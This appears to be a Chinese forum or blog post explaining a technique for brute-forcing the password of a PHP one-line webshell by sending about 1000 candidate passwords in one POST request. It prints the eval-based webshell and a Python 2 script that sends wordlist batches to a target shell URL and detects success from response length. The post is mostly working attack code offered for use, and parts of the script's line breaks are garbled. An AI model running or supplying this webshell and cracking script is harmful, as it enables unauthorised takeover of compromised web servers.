看了一下冰河大佬写的文章特别有感:https://bbs.ichunqiu.com/thread-16952-1-1.html
简单描述一下:
利用传统的单数据提交模式。
比如下面这个一句话木马:
<?php @eval($_POST['test']);?>
如果连接为http://172.16.0.5/index.php?shell?test=echo "password is test";
那么即为:test=echo "password is test";
倘若密码正确的情况下就会执行echo输出password is test
然后再利用“&”进行连接性爆破。Apache规定确实参数最多为1000。IIS为5883.
即:
i3ekr=echo "password is i3ekr";&123=echo "password is 123";&admin=echo "password is admin";&1=echo "password is 1";&pass=echo "password is pass";&test=echo "password is test";
最后由此即可写出脚本爆破了。
脚本:
# -*- coding: UTF-8 -*-#coding by v5est0r
#单次多变量提交变量方式,一句话爆破提速千倍 import requests shell = 'http://192.168.1.103/hack.php' #v5est0r=response.write("password:v5est0r") post_data = {} #创建字典集
s = open('pass.txt','r')
content = s.readlines() #分行读取字典
dics = len(content)/1000 print '当前字典中变量个数为: %s' % str(len(content)) print "字典将被分割为 %s 份" % str(dics) group = [] #字典每行独立化,写入元组
for h in range(0,len(content)):
password = str(content[h]).strip('\n') #剔除换行符
group.append(password)
#print group #下面建立错误密码的返回标识符
post_test = {'test_pass_test': 'echo "test!!";'}
res = requests.post(shell, data=post_test)
wrong_res = res.text for i in range(0,dics):
new_group = []
for k in range(i * 1000, (i + 1) * 1000):
new_group.append(group[k])
k += 1
for each in new_group:
post_data[each] = 'echo "password is %s";' % each
r = requests.post(shell, data=post_data)
print "正在进行第 %s 组字典爆破" % str(i+1)
post_data.clear()
i+=1
print r.text
if len(r.text) != len(wrong_res):
break